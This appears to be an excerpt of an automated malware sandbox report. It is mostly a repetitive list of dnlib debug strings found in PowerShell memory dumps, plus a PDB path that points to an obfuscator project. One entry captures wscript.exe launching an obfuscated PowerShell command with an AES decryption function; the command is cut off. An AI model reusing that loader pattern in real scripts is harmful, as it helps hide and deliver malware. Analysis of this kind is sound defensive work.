                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.StdIn();IHost.StdErr();IHost.StdOut();IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.FullName();IWshShell3.Run("powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([Str", "0", "false")
